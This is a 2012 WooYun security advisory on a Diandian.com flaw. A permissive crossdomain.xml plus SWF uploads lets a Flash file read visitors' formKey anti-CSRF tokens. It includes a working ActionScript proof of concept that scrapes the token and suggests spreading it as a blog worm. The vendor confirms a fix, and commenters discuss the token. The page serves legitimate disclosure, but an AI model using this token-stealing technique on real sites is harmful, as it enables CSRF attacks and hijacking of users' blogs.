当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09056

漏洞标题:点点网formKey泄露

相关厂商:点点网

漏洞作者: p.z

提交时间:2012-06-30 10:29

修复时间:2012-08-14 10:30

公开时间:2012-08-14 10:30

漏洞类型:应用配置错误

危害等级:高

自评Rank:14

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-30: 细节已通知厂商并且等待厂商处理中
2012-07-01: 厂商已经确认,细节仅向厂商公开
2012-07-11: 细节向核心白帽子及相关领域专家公开
2012-07-21: 细节向普通白帽子公开
2012-07-31: 细节向实习白帽子公开
2012-08-14: 细节向公众公开

简要描述:

详细说明:

模版静态资源上传页面(http://www.diandian.comhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/asset)和Flash跨域通信的配置文件中(http://www.diandain.com/crossdomain.xml)允许的域名相同,只需上传一个SWF,就可以读到formKey了。把这SWF嵌入到blog页面中,读到访客的formKey,调用externalInterface把值给输到JS里,又能worm了吧。

漏洞证明:

http://x.libdd.com/farm1/f15341/7cef03a1/diandian.swf

var result_txt = new TextField();
result_txt.x = 0;
result_txt.y = 0;
result_txt.height = 22;
result_txt.width = 200;
addChild(result_txt);
var targetURL:String="http://www.diandian.com/home";
var request:URLRequest=new URLRequest(targetURL);
request.method=URLRequestMethod.GET;
var loader:URLLoader=new URLLoader();
loader.addEventListener(Event.COMPLETE,completeHandler);
function completeHandler(event:Event){
  var formKey:String = loader.data;
  formKey = formKey.split("window.DDformKey = '")[1].split("'")[0]
  result_txt.text = formKey
}
loader.load(request)


效果就这样:

修复方案:

改配置文件?改存储静态文件的域名?

版权声明:转载请注明来源 p.z@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2012-07-01 00:54

厂商回复:

再一次感谢p.z帮助发现一个高危漏洞.
随着业务发展, 原来完全由点点控制的域名下也开始有用户脚本. 当时权限放的太开, 考虑不周.
线上目前已经修复.

最新状态:

暂无

漏洞评价:

评论

  1. 2012-06-30 19:36 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近,再也不当上错图的2...)

    哈哈,这东西当时我也看到了,但是不知道是神马~~求大牛科目

  2. 2012-07-01 08:54 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    @顺子 DDformKey应该就是点点防止CSRF的一个token,这串token只在www域下才出现在源码中,所以拿到xxx.diandian.com这类的xss基本没有什么作用,因为拿不到formKey,就不能csrf修改访客的博客设置。

  3. 2012-07-01 09:16 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @p.z 恩, xxx.diandian.com 本身就是开放自定义JS功能的,所以formkey就是唯一的一道防线了。得formkey者得点点。。

  4. 2012-07-01 11:34 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @顺子 相当于腾讯的g_tk 腾讯g_tk固定算法的...

  5. 2012-07-01 17:11 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近,再也不当上错图的2...)

    谢谢大牛科普了

  6. 2012-07-11 08:45 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    = =难怪俺去上传flash的时候,上传不了了。。。